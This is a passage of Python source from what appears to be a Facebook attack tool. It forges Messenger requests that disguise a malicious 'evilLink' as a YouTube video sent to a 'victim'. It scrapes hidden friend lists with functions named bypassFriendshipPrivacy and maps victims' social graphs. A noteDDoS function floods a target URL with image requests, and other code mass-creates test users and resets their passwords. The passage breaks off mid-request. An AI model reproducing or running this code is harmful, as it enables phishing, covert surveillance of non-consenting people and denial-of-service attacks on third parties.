'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_cleared]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : str(message),
'message_batch[0][has_attachment]' : 'true',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:'+str(victimId),
'message_batch[0][specific_to_list][1]' : 'fbid:'+str(c_user),
'message_batch[0][content_attachment][subject]' : str(subject),
'message_batch[0][content_attachment][app_id]' : '2309869772',
'message_batch[0][content_attachment][attachment][params][urlInfo][canonical]' : str(videoLink),
'message_batch[0][content_attachment][attachment][params][urlInfo][final]' : str(videoLink),
'message_batch[0][content_attachment][attachment][params][urlInfo][user]' : str(evilLink),
'message_batch[0][content_attachment][attachment][params][urlInfo][log][1408344793]' : 'https://www.mkit.com.ar/',
'message_batch[0][content_attachment][attachment][params][favicon]' : 'http://s.ytimg.com/yts/img/favicon_32-vflWoMFGx.png',
'message_batch[0][content_attachment][attachment][params][title]' : str(title),
'message_batch[0][content_attachment][attachment][params][summary]' : str(summary),
'message_batch[0][content_attachment][attachment][params][images][0]' : 'http://i1.ytimg.com/vi/'+videoID+'/mqdefault.jpg?feature=og&cfs=1&upscale',
'message_batch[0][content_attachment][attachment][params][medium]' : '103',
'message_batch[0][content_attachment][attachment][params][url]' : str(videoLink),
'message_batch[0][content_attachment][attachment][params][video][0][type]' : 'application/x-shockwave-flash',
'message_batch[0][content_attachment][attachment][params][video][0][src]' : 'http://www.youtube.com/v/'+str(hijackedVideo)+'?version=3&autohide=1&autoplay=1',
'message_batch[0][content_attachment][attachment][params][video][0][width]' : '1280',
'message_batch[0][content_attachment][attachment][params][video][0][height]' : '720',
'message_batch[0][content_attachment][attachment][params][video][0][secure_url]' : 'https://www.youtube.com/v/'+str(hijackedVideo)+'?version=3&autohide=1&autoplay=1',
'message_batch[0][content_attachment][attachment][type]' : '100',
'message_batch[0][content_attachment][link_metrics][source]' : 'ShareStageExternal',
'message_batch[0][content_attachment][link_metrics][domain]' : 'www.youtube.com',
'message_batch[0][content_attachment][link_metrics][base_domain]' : 'youtube.com',
'message_batch[0][content_attachment][link_metrics][title_len]' : str(len(title)),
'message_batch[0][content_attachment][link_metrics][summary_len]' : str(len(summary)),
'message_batch[0][content_attachment][link_metrics][min_dimensions][0]' : '70',
'message_batch[0][content_attachment][link_metrics][min_dimensions][1]' : '70',
'message_batch[0][content_attachment][link_metrics][images_with_dimensions]' : '1',
'message_batch[0][content_attachment][link_metrics][images_pending]' : '0',
'message_batch[0][content_attachment][link_metrics][images_fetched]' : '0',
'message_batch[0][content_attachment][link_metrics][image_dimensions][0]' : '1280',
'message_batch[0][content_attachment][link_metrics][image_dimensions][1]' : '720',
'message_batch[0][content_attachment][link_metrics][images_selected]' : '1',
'message_batch[0][content_attachment][link_metrics][images_considered]' : '1',
'message_batch[0][content_attachment][link_metrics][images_cap]' : '10',
'message_batch[0][content_attachment][link_metrics][images_type]' : 'images_array',
'message_batch[0][content_attachment][composer_metrics][best_image_w]' : '100',
'message_batch[0][content_attachment][composer_metrics][best_image_h]' : '100',
'message_batch[0][content_attachment][composer_metrics][image_selected]' : '0',
'message_batch[0][content_attachment][composer_metrics][images_provided]' : '1',
'message_batch[0][content_attachment][composer_metrics][images_loaded]' : '1',
'message_batch[0][content_attachment][composer_metrics][images_shown]' : '1',
'message_batch[0][content_attachment][composer_metrics][load_duration]' : '2',
'message_batch[0][content_attachment][composer_metrics][timed_out]' : '0',
'message_batch[0][content_attachment][composer_metrics][sort_order]' : '',
'message_batch[0][content_attachment][composer_metrics][selector_type]' : 'UIThumbPager_6',
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][status]' : '0',
'message_batch[0][message_id]' : '<1410457740680:[email protected]>',
'message_batch[0][client_thread_id]' : 'user:'+str(victimId),
'client' : 'web_messenger',
'__user' : str(c_user),
'__a' : '1',
'__dyn' : '7n8ahyj35CCOadgDxqjdLg',
'__req' : 'c',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '265816977807275100848411568',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php ',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Ctrl+c SIGNAL Caught\n'
return
def linkFriends(victim):
friends = []
root = 'dumps'
directory = victim
delay = 1
linkedFile = open( os.path.join(root,directory,victim+"friend_links.html"),"wb")
try:
persons = open( os.path.join(root,directory,victim+".txt") ,"rb")
except:
print '\r \r',
print '\r %s.txt not exists, error on linkFriends module \r' %victim,
logs(str(victim)+' not exists, error on linkFriends module')
return
while True:
linea = persons.readline()
if not linea:
break
friends.append(linea.strip("\n\r"))
persons.close()
for individuals in friends:
try:
response = br.open('https://graph.facebook.com/'+individuals)
resultado = response.read()
json_dump = json.loads(resultado)
try:
friend = json_dump['link']+' '+json_dump['name']+' '+json_dump['gender']+ ' '+ json_dump['locale']
print friend
linkedFile.write(MyParser.htmlFormat(json_dump))
except:
try:
print 'https://www.facebook.com/%s' %json_dump['username']+' '+json_dump['name']+' '+json_dump['gender']+ ' '+ json_dump['locale']
except:
print 'https://www.facebook.com/%s' %individuals
except mechanize.HTTPError as e:
print e.code
print 'Sleeping %d' %delay
sleep(delay)
delay += 1
except mechanize.URLError as e:
print e.reason.args
print 'Sleeping %d URLerror ' %delay
sleep(delay)
delay += 1
linkedFile.close()
def getName(userId):
try:
response = br.open('https://www.facebook.com/'+str(userId))
data = response.read()
match = re.search("_8_2",data)
if match is not None:
start = match.end() + 33
matchBis = re.search('">',data[start:])
if matchBis is not None:
return data[start:start+matchBis.start()]
return userId
except mechanize.HTTPError as e:
print str(e.code)
return userId
except mechanize.URLError as e:
print str(e.reason.args)
return userId
except:
return userId
def mkdir(directory,root):
import os
if os.path.exists(os.path.join(root,directory)):
return
else:
os.makedirs(os.path.join(root,directory))
def saveObjects(victim,matrix,ref):
path = os.path.join("dumps",victim,"objects",victim)
f = open(path,"wb")
pickle.dump(matrix,f)
g = open(path+'.ref',"wb")
pickle.dump(ref,g)
g.close()
f.close()
def loadObjects(victim):
try:
path = os.path.join("dumps",victim,"objects",victim)
f = open(path,"rb")
A = pickle.load(f)
g = open( path +'.ref',"rb")
ref = pickle.load(g)
g.close()
f.close()
return A,ref
except:
return [],{}
def reAnalyzeGraph(victim):
try:
f = open( os.path.join("dumps",victim,"objects",victim+"-community" ) ,"rb")
labelGraph = pickle.load(f)
f.close()
except:
logs('Error on reAnalyzeGraph() object not exist')
print 'Error on reAnalyzeGraph() object not exist\n'
return
root = 'dumps'
directory = victim
try:
partition = community.best_partition(labelGraph)
for i in set(partition.values()):
print "Community", i
members = [nodes for nodes in partition.keys() if partition[nodes] == i]
egonet = labelGraph.subgraph(set(members))
print sorted(egonet.nodes(),reverse=False)
print sorted(egonet.edges(),reverse=False)
nx.draw_spring(egonet,node_color = np.linspace(0,1,len(egonet.nodes())),edge_color = '#000000' ,with_labels=True)
plt.savefig( os.path.join(root,directory,victim+"Community"+str(i)+".pdf") )
plt.savefig( os.path.join(root,directory,victim+"Community"+str(i)+".png") )
write_dot(egonet, os.path.join(root,directory,victim+"Community"+str(i)+".dot") )
plt.show()
raw_input('Press enter to continue...\n')
except:
logs('Error on reAnalyzeGraph() debbug for more information')
print 'Error on reAnalyzeGraph() debbug for more information\n'
return
def analyzeGraph(victim):
root = 'dumps'
directory = victim
mkdir(directory,root)
edges = {}
edgesValues = {}
nodekeys = {}
userNames = []
commonPages = {}
A,idkeys = loadObjects(victim)
if A != []:
myGraph = nx.from_numpy_matrix(A)
nodes = myGraph.nodes()
i = 0.0
percentage = 0.0
print '\r \r',
print 'Attemping to get user\'s information'
for elements in idkeys.keys():
try:
user = getName(elements)
commonPages[user] = corePagesLike(victim,elements)
userNames.append(user)
nodekeys[idkeys[elements]] = user
percentage = (i * 100.0)/len(idkeys.keys())
flush()
print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(idkeys.keys()), percentage),
i+=1
except:
continue
reference = open( os.path.join(root,directory,victim+"references.txt") ,"wb")
for users in nodekeys.keys():
try:
line = str(nodekeys[users])+' : '+str(users)
reference.write(line + '\n')
except:
continue
reference.close()
for node in nodes:
try:
edges[node] = myGraph.degree(node)
if edgesValues.has_key(edges[node]):
edgesValues[edges[node]].append(node)
else:
edgesValues[edges[node]] = [node]
except:
continue
for values in sorted(edgesValues.keys(),reverse=True):
try:
print str(values) + ' aristas; nodos: ',
for nodes in edgesValues[values]:
print str(nodes) + ', ',
print '\n'
except:
continue
print nx.is_connected(myGraph)
print nx.number_connected_components(myGraph)
ccs = nx.clustering(myGraph)
print ccs
print sum(ccs)/len(ccs)
labelNodes = myGraph.nodes()
labelEdges = myGraph.edges()
labelGraph = nx.Graph()
for label in labelNodes:
try:
labelGraph.add_node(nodekeys[int(label)],likes=commonPages[nodekeys[int(label)]])
except:
continue
for labelE in labelEdges:
try:
labelGraph.add_edge(nodekeys[int(labelE[0])],nodekeys[int(labelE[1])])
except:
continue
try:
nx.draw_spring(labelGraph,node_color = np.linspace(0,1,len(labelGraph.nodes())),edge_color = np.linspace(0,1,len(labelGraph.edges())) ,with_labels=True)
plt.savefig( os.path.join(root,directory,victim+"labelGraph_color.pdf") )
plt.savefig( os.path.join(root,directory,victim+"labelGraph_color.png") )
write_dot(labelGraph, os.path.join(root,directory,victim+"labelGraph_color.dot") )
plt.show()
except:
print 'Erro plotting the graph'
f = open( os.path.join("dumps",victim,"objects",victim+"-community") ,"wb")
pickle.dump(labelGraph,f)
f.close()
partition = community.best_partition(labelGraph)
for i in set(partition.values()):
try:
print "Community", i
members = [nodes for nodes in partition.keys() if partition[nodes] == i]
except:
continue
''' No longer necessary (?)
reference = open(root+"\\"+directory+"\\community"+str(i)+"references.txt","wb")
for nodes in members:
line = str(nodekeys[int(nodes)])+' : '+str(nodes)
reference.write(line + '\n')
reference.close()
'''
try:
egonet = labelGraph.subgraph(set(members))
print sorted(egonet.nodes(),reverse=False)
print sorted(egonet.edges(),reverse=False)
nx.draw_spring(egonet,node_color = np.linspace(0,1,len(egonet.nodes())),edge_color = '#000000' ,with_labels=True)
plt.savefig( os.path.join(root,directory,victim+"Community"+str(i)+".pdf") )
plt.savefig( os.path.join(root,directory,victim+"Community"+str(i)+".png") )
write_dot(egonet, os.path.join(root,directory,victim+"Community"+str(i)+".dot") )
plt.show()
except:
print 'Error plotting the graph'
raw_input('Press enter to continue...\n')
else:
logs('Error on analyzeGraph() file not exist')
print 'Error on analyzeGraph() file not exist\n'
return
def bypassFriendshipPrivacyPlot(victim, transitive):
coleccion = {}
nodeID = 0
root = 'dumps'
directory = str(victim)
mkdir(directory,root)
myGraph = nx.Graph()
coleccion[victim] = nodeID
victima = nodeID
myGraph.add_node(victima)
nodeID += 1
percentage = 0.0
friendships = []
visited = []
try:
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"rb")
while True:
linea = friendshipFile.readline()
if not linea:
break
visited.append(linea.strip("\n\r"))
friendshipFile.close()
A,coleccion = loadObjects(victim)
if A == []:
logs("Inconsistency, the userid file exists, but has no object associated")
print "Inconsistency, the userid file exists, but has no object associated"
return
else:
myGraph = nx.from_numpy_matrix(A)
except:
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"wb")
friendshipFile.close()
try:
result = coreFriendshipPrivacy(victim,transitive)
except:
print 'Check the internet connection please..'
return
for individuos in result:
if individuos not in visited:
if coleccion.has_key(individuos) == False:
nodo = nodeID
nodeID += 1
coleccion[individuos] = nodo
else:
nodo = coleccion[individuos]
if coleccion.has_key(transitive) == False:
transitivo = nodeID
nodeID += 1
coleccion[transitive] = transitivo
else:
transitivo = coleccion[transitive]
myGraph.add_node(nodo)
myGraph.add_edge(nodo,transitivo)
friendships.append(individuos)
i = 0.0
print '\r \r',
for friends in friendships:
percentage = (i * 100.0)/len(friendships)
flush()
print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage),
i+=1
if friends not in visited:
state = True
while state == True:
try:
result = coreFriendshipPrivacy(victim,friends)
state = False
except signalCaught as e:
state = False
print 'Signal Caught handler'
print '%s ' %e.args[0]
return
except:
logs('Check the internet connection please.. Press enter when it\'s done')
print '\r \r',
raw_input('\rCheck the internet connection please.. Press enter when it\'s done\r'),
for element in result:
if element not in friendships:
if coleccion.has_key(friends) == False:
nodo = nodeID
nodeID += 1
coleccion[friends] = nodo
else:
nodo = coleccion[friends]
if coleccion.has_key(element) == False:
transitivo = nodeID
nodeID += 1
coleccion[element] = transitivo
else:
transitivo = coleccion[element]
myGraph.add_node(nodo)
myGraph.add_edge(nodo,transitivo)
friendships.append(element)
visited.append(friends)
try:
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"ab")
except:
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"wb")
for friends in friendships:
if coleccion.has_key(friends) == False:
transitivo = nodeID
nodeID += 1
coleccion[friends] = transitivo
else:
transitivo = coleccion[friends]
myGraph.add_edge(victima,transitivo)
friendshipFile.write(str(friends)+'\n')
friendshipFile.close()
mkdir('objects', os.path.join(root,directory))
A = nx.adj_matrix(myGraph)
saveObjects(victim, A, coleccion)
nx.draw_spring(myGraph,node_color = np.linspace(0,1,len(myGraph.nodes())),edge_color = np.linspace(0,1,len(myGraph.edges())) ,with_labels=True)
plt.savefig( os.path.join(root,directory,victim+"graph_color.pdf") )
plt.savefig( os.path.join(root,directory,victim+"graph_color.png") )
write_dot(myGraph,os.path.join(root,directory,victim+"graph_color.dot"))
plt.show()
def bypassFriendshipPrivacy(victim, transitive):
percentage = 0.0
friendships = []
visited = []
try:
friendshipFile = open( os.path.join("dumps",victim+".txt") ,"rb")
while True:
linea = friendshipFile.readline()
if not linea:
break
visited.append(linea.strip("\n\r"))
friendshipFile.close()
except:
friendshipFile = open( os.path.join("dumps",victim+".txt") ,"wb")
friendshipFile.close()
try:
result = coreFriendshipPrivacy(victim,transitive)
except:
print '\r \r',
raw_input('\rCheck the internet connection please.. Press enter when it\'s done\r'),
return
for individuos in result:
if individuos not in visited:
friendships.append(individuos)
i = 0.0
print '\r \r',
for friends in friendships:
percentage = (i * 100.0)/len(friendships)
flush()
print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage),
i+=1
if friends not in visited:
state = True
while state == True:
try:
result = coreFriendshipPrivacy(victim,friends)
state = False
except signalCaught as e:
state = False
print 'Signal Caught handler'
print '%s ' %e.args[0]
return
except:
print '\r \r',
raw_input('\rCheck the internet connection please..\r'),
for element in result:
if element not in friendships:
friendships.append(element)
visited.append(friends)
try:
friendshipFile = open( os.path.join("dumps",victim+".txt") ,"ab")
except:
friendshipFile = open( os.path.join("dumps",victim+".txt") ,"wb")
for friends in friendships:
friendshipFile.write(str(friends)+'\n')
friendshipFile.close()
def corePagesLike(victim,transitive):
matchs = []
begin = 0
page = []
try:
response = br.open('https://www.facebook.com/'+str(victim)+'?and='+str(transitive)+'&sk=favorites')
resultado = response.read()
match = re.search('timelineFriendsColumnHeader',resultado)
if match is not None:
linea = re.search('timelineFriendsColumnHeader(.+)',resultado).group()
except mechanize.HTTPError as e:
print e.code
raise
except mechanize.URLError as e:
print e.reason.args
raise
except:
raise
while True:
match = re.search('fbStreamTimelineFavInfoContainer',resultado[begin:])
if match != None:
matchEnd = re.search('\n',resultado[begin+match.start():])
if matchEnd != None:
matchs.append(resultado[begin+match.start():matchEnd.end()+begin+match.start()])
begin = matchEnd.end()+begin+match.start()
match = None
matchEnd = None
else:
break
for linea in matchs:
start = 0
try:
matchAnd = re.search('page\.php\?id=',linea[start:])
matchEnd = re.search('">',linea[start+matchAnd.end():])
except:
print 'ERROR'
if (matchAnd and matchEnd) is not None:
page.append(linea[start+matchAnd.end():start+matchEnd.start()+matchAnd.end() ])
start += matchEnd.start()+matchAnd.end()
return page
def checkPrivacy(victim):
try:
response = br.open('https://www.facebook.com/'+str(victim)+'?sk=friends')
resultado = response.read()
match = re.search('All Friends',resultado)
matchBis = re.search('Todos los amigos',resultado)
matchBisBis = re.search('Todos mis amigos',resultado)
if ((match is not None) or (matchBis is not None) or (matchBisBis is not None)):
matchFriends = re.search('_1qp6(.+)"',resultado).group()
return matchFriends
else:
return -1
except:
print 'Error in the process, brute force will be applied ..'
return -1
def simpleGraph(friends, victim):
coleccion = {}
nodeID = 0
root = 'dumps'
directory = str(victim)
mkdir(directory,root)
myGraph = nx.Graph()
myGraphLabeled = nx.Graph()
coleccion[victim] = nodeID
victima = nodeID
myGraph.add_node(victima)
nodeID += 1
try:
friendshipFile = open( os.path.join(root,directory,victim+".txt"),"ab")
except:
friendshipFile = open( os.path.join(root,directory,victim+".txt"),"wb")
try:
usersAndID = pickle.load(open(os.path.join('dumps',victim,victim+"UserNamesIDindexed.txt"),"rb"))
except:
print 'Something went wrong while loading the userId and usernames dictionary file! '
try:
myGraphLabeled.add_node(usersAndID[victim])
except:
myGraphLabeled.add_node(victim)
total = len(friends)
i = 0.0
print 'Getting victim\'s friends relashionship .. please wait, this is going to take a while...'
print 'Get a coffee or something'
for friend in friends:
percentage = (i * 100.0)/total
flush()
print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,total, percentage),
i+=1
friendshipFile.write(str(friend)+'\n')
try:
mutual = coreFriendshipPrivacy(victim, friend)
except:
continue
coleccion[friend] = nodeID
nodeID += 1
if myGraph.has_node(friend) != True:
myGraph.add_node(friend)
try:
myGraphLabeled.add_node(usersAndID[friend])
except:
myGraphLabeled.add_node(friend)
if myGraph.has_edge(victima, friend) != True:
myGraph.add_edge(victima, friend)
try:
myGraphLabeled.add_edge(usersAndID[victim],usersAndID[friend])
except:
myGraphLabeled.add_edge(victim,friend)
for element in mutual:
if myGraph.has_node(element) != True:
myGraph.add_node(element)
myGraph.add_edge(element, friend)
try:
myGraphLabeled.add_node(usersAndID[element])
myGraphLabeled.add_edge(usersAndID[element],usersAndID[friend])
except:
myGraphLabeled.add_node(element)
myGraphLabeled.add_edge(element,friend)
friendshipFile.close()
mkdir('objects', os.path.join(root,directory))
A = nx.adj_matrix(myGraph)
saveObjects(victim, A, coleccion)
nx.draw_spring(myGraph,node_color = np.linspace(0,1,len(myGraph.nodes())),edge_color = np.linspace(0,1,len(myGraph.edges())) ,with_labels=True)
plt.savefig( os.path.join(root,directory,victim+"graph_color.pdf") )
plt.savefig( os.path.join(root,directory,victim+"graph_color.png") )
write_dot(myGraph,os.path.join(root,directory,victim+"graph_color.dot"))
plt.show()
nx.draw_spring(myGraphLabeled,node_color = np.linspace(0,1,len(myGraphLabeled.nodes())),edge_color = np.linspace(0,1,len(myGraphLabeled.edges())) ,with_labels=True)
plt.savefig( os.path.join(root,directory,victim+"graphLabeled_color.pdf") )
plt.savefig( os.path.join(root,directory,victim+"graphLabeled_color.png") )
write_dot(myGraphLabeled,os.path.join(root,directory,victim+"graphLabeled_color.dot"))
plt.show()
def checkMe(username):
if username == 'me':
driver = webdriver.Firefox()
driver.get("https://www.facebook.com/")
cookies = pickle.load(open("cookies.pkl", "rb"))
for cookie in cookies:
driver.add_cookie(cookie)
driver.get("https://m.facebook.com/me")
name = driver.current_url
name = name.replace("https://m.facebook.com/","")
match = re.search("([a-zA-Z]+\.*[0-9]*)*",name)
if match is not None:
username = match.group()
driver.close()
return username
def friendshipPlot(text,victim):
friends = []
friendsID = []
getFriends(victim)
try:
friendsFile = open(os.path.join('dumps',victim,victim+"UserNames.txt"),"r")
except:
print 'Something went wrong with the output file.. try again or debug :D '
return
while True:
linea = friendsFile.readline()
if not linea:
break
friends.append(linea.strip('\r\n'))
print 'Wait while we get the user id\'s of your victim\'s friends '
getUserIDS(victim)
try:
friendsIdFile = open(os.path.join('dumps',victim,victim+"UserIDS.txt"),"r")
except:
print 'Something went wrong with the output file.. try again or debug :D '
return
while True:
linea = friendsIdFile.readline()
if not linea:
break
friendsID.append(linea.strip('\r\n'))
return friendsID, friends
def coreFriendshipPrivacy(victim,transitive):
friends = []
try:
response = br.open('https://www.facebook.com/friendship/'+str(victim)+'/'+str(transitive))
resultado = response.read()
match = re.search('\/browse\/mutual_friends\/\?uid\=',resultado)
if match is not None:
matchEnd = re.search("\"",resultado[match.end():])
if matchEnd is not None:
link = resultado[match.start():match.end()+matchEnd.start()].replace("&","&")
response = br.open('https://www.facebook.com/'+link)
linea = response.read()
except mechanize.HTTPError as e:
print e.code
raise
except mechanize.URLError as e:
print e.reason.args
raise
except:
raise
start = 0
while True:
try:
matchAnd = re.search('user\.php\?id=',linea[start:])
matchEnd = re.search('&',linea[start+matchAnd.end():])
if (matchAnd and matchEnd) is not None:
toUserID = linea[start+matchAnd.end():start+matchEnd.start()+matchAnd.end()]
if toUserID not in friends:
friends.append(toUserID)
start += matchEnd.start()+matchAnd.end()
except:
match = re.search('/ajax/browser/list/mutualfriends/',resultado)
if match is not None:
extend = seeMore(len(friends),victim,transitive)
return list(set(extend + friends))
else:
return friends
def seeMore(start,victim,transitive):
victimId = getUserID(victim)
transitiveId = getUserID(transitive)
extendedFriends = []
if (victimId == -1) or (transitiveId == -1):
return extendedFriends
while True:
try:
response = br.open('https://www.facebook.com/ajax/browser/list/mutualfriends/?uid='+str(transitiveId)+'&view=grid&location=other&infinitescroll=0&short=1&node='+str(victimId)+'&start='+str(start)+'&__user='+str(getC_user())+'&__a=1&__dyn=7n8ahyj35zolgDxqihXzA&__req=6')
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
raise
to_parse = str(response.read()).strip('for (;;);')
try:
json_dump = json.loads(to_parse)
except:
print 'Error on json loading'
return extendedFriends
offset = 0
NoneFlag = True
for element in range(len(json_dump['jsmods']['require'])):
if json_dump['jsmods']['require'][element][0] == unicode('AddFriendButton'):
NoneFlag = False
offset += 1
extendedFriends.append(json_dump['jsmods']['require'][element][3][1])
if NoneFlag:
break
start += offset
return extendedFriends
def getUserID(user):
try:
response = br.open('https://www.facebook.com/'+str(user))
data = response.read()
except mechanize.HTTPError as e:
print e.code
return -1
except mechanize.URLError as e:
print e.reason.args
return -1
try:
match = re.search("fb://profile/",data)
if match is not None:
start = match.end()
matchBis = re.search('"',data[start:])
if matchBis is not None:
return data[start:start+matchBis.start()]
except:
return user
def logs(messagelog):
logging.basicConfig(filename=os.path.join("logs","error.log"), level=logging.NOTSET, format='')
cTime = ctime(time())
log = str(cTime) + ' : ' + str(messagelog)
logging.debug(log)
def dotFile(victim, transitive):
root = 'dumps'
directory = str(victim)
mkdir(directory,root)
myGraph = open( os.path.join(root,directory,victim+"_dot.dot") ,"wb")
myGraph.write('Graph {\n')
percentage = 0.0
friendships = []
visited = []
try:
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"rb")
while True:
linea = friendshipFile.readline()
if not linea:
break
visited.append(linea.strip("\n\r"))
friendshipFile.close()
except:
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"wb")
friendshipFile.close()
try:
result = coreFriendshipPrivacy(victim,transitive)
except:
print 'Check the internet connection please..'
return
transitivo = getName(transitive)
for individuos in result:
if individuos not in visited:
chabon = getName(individuos)
myGraph.write(' "'+transitivo + '" -> "' + chabon + '";\n')
friendships.append(individuos)
visited.append(getUserID(transitive))
i = 0.0
print '\r \r',
for friends in friendships:
percentage = (i * 100.0)/len(friendships)
flush()
print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage),
i+=1
if friends not in visited:
state = True
while state == True:
try:
result = coreFriendshipPrivacy(victim,friends)
state = False
except signalCaught as e:
state = False
print 'Signal Caught handler'
print '%s ' %e.args[0]
return
except:
logs('Check the internet connection please.. Press enter when it\'s done')
print '\r \r',
a = raw_input('\rCheck the internet connection please.. Press enter when it\'s done\r')
if a == 1:
state = False
else:
if a == 2:
email,password = setMail()
login(email,password,'real')
friendName = getName(friends)
for element in result:
if element not in friendships:
transitive = getName(element)
myGraph.write(' "'+friendName + '" -> "' + transitive + '";\n')
friendships.append(element)
visited.append(friends)
try:
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"ab")
except:
friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"wb")
for friends in friendships:
transitivo = getName(friends)
myGraph.write(' "'+victim + '" -> "' + transitivo + '";\n')
friendshipFile.write(str(friends)+'\n')
myGraph.write('}')
friendshipFile.close()
myGraph.close()
def simpleDotGraph(friends, victim):
root = 'dumps'
directory = str(victim)
mkdir(directory,root)
myGraph = open( os.path.join(root,directory,victim+"_dot.dot"),"wb")
myGraph.write('Graph {\n')
friendshipFile = open( os.path.join(root,directory,victim+".txt"),"wb")
for friend in friends:
friendshipFile.write(str(friend)+'\n')
friendshipFile.close()
for friend in friends:
try:
mutual = coreFriendshipPrivacy(victim, friend)
except:
continue
transitive = getName(friend)
myGraph.write(' "'+victim + '" -> "' + transitive + '";\n')
for element in mutual:
mutualFriend = getName(element)
myGraph.write(' "'+transitive + '" -> "' + mutualFriend + '";\n')
myGraph.write('}')
myGraph.close()
def noteDDoS(imageURL,noteID, privacy):
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
j = int(raw_input('starting parameter number? (img.jpg?file=number) : '))
amount = int(raw_input('last parameter number? (img.jpg?file=number) : '))
title = raw_input('Note title: ')
content = '<p>' + raw_input('Note preview text: ') + '</p>'
for i in range(j,int(amount)):
content += '<p><img src="'+imageURL+'?file='+str(i)+'"></img></p>'
arguments = {
'fb_dtsg' : fb_dtsg,
'object_id' : noteID,
'note_id' : noteID,
'id' : getC_user(),
'title' : title,
'note_content' : content,
'audience['+noteID+'][value]' : privacy,
'publish' : 'Publish',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7n8ahyj34fzpQ9UoHaEWy1m9ACwKyaF3pqzCAjFDxCm6qyE',
'__req' : '7',
'ttstamp' : '2658169897154120115496511690',
'__rev' : '1224624'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/notes/edit',datos)
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the DDoS module')
print '\rError in the DDoS module\r'
raise
def devTest(appID):
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
br.open('https://developers.facebook.com/').read()
arguments = {
'fb_dtsg' : fb_dtsg,
'count' : '4',
'app_id' : str(appID),
'install_app' : '1',
'platform_version' : 'v2.0',
'enable_ticker' : '1',
'language' : 'en_US',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7w86i1PyUnxqnFwn8',
'__req' : '3',
'ttstamp' : '2658172110116109767311810511273',
'__rev' : '1262242'
}
datos = urlencode(arguments)
response = br.open('https://developers.facebook.com/apps/async/test-users/create/',datos)
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in devTest module')
print '\rError in devTest module\r'
raise
'''
def getTest(appID):
try:
response = br.open('https://developers.facebook.com/apps/'+appID+'/roles/test-users/')
linea = response.read()
lines = []
match = re.search('test_users'+'(.+)',linea)
if match is not None:
encontrada = match.group()
start = 0
while True:
matchstart = re.search('test_user_ids',encontrada[start:])
if matchstart is not None:
matchend = re.search('\.net',encontrada[start+matchstart.end():])
if (matchstart is not None) and (matchend is not None):
final = encontrada[start+matchstart.start() : matchend.end()+start+matchstart.end()]
lines.append(final)
start = start+matchstart.start()+matchend.end()
else:
break
email = []
name = []
userid = []
for linea in lines:
matchstart =re.search('value="',linea)
matchend = re.search('"',linea[matchstart.end():])
userid.append(linea[matchstart.end():matchstart.end()+matchend.start()])
for linea in lines:
start=0
while True:
matchstart = re.search("\"_50f4\">",linea[start:])
if matchstart is not None:
matchend = re.search('</span>',linea[start+matchstart.end():])
if (matchstart is not None) and (matchend is not None):
final = linea[start+matchstart.end() : matchend.start()+start+matchstart.end()]
name.append(final)
start = start+matchstart.start()+matchend.end()
matchstart = re.search("_5jxf\"><span class=\"_50f4\">",linea[start:])
if matchstart is not None:
email.append(linea[matchstart.end()+start:].replace('@','@'))
break
else:
print 'error'
else:
break
for elements in email:
print elements
for elements in name:
print elements
for elements in userid:
print elements
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in getTest module')
print '\rError in getTest module\r'
raise
'''
def getTest(appID):
try:
start = 0
flag = 0
while flag != -1:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'start' : str(start),
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7w86i1PyUnxqnFwn8',
'__req' : '4',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '26581707111311350113871144898',
'__rev' : '1262242'
}
datos = urlencode(arguments)
try:
response = br.open('https://developers.facebook.com/apps/'+appID+'/roles/test-users/paging/',datos)
aParsear = response.read().strip("for (;;);")
json_dump = json.loads(aParsear)
flag = MyParser.parceros(json_dump)
start+=20
except:
break
except:
print 'general error'
def changePassword(appID):
people = database.getUsers()
peopleLogged = database.getUsersNotLogged()
for persona in people:
if persona in peopleLogged:
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'fb_dtsg' : fb_dtsg,
'name' : str(persona[1]),
'password' : '1234567890',
'confirm_password' : '1234567890',
'__user' : getC_user(),
'__a' : '1',
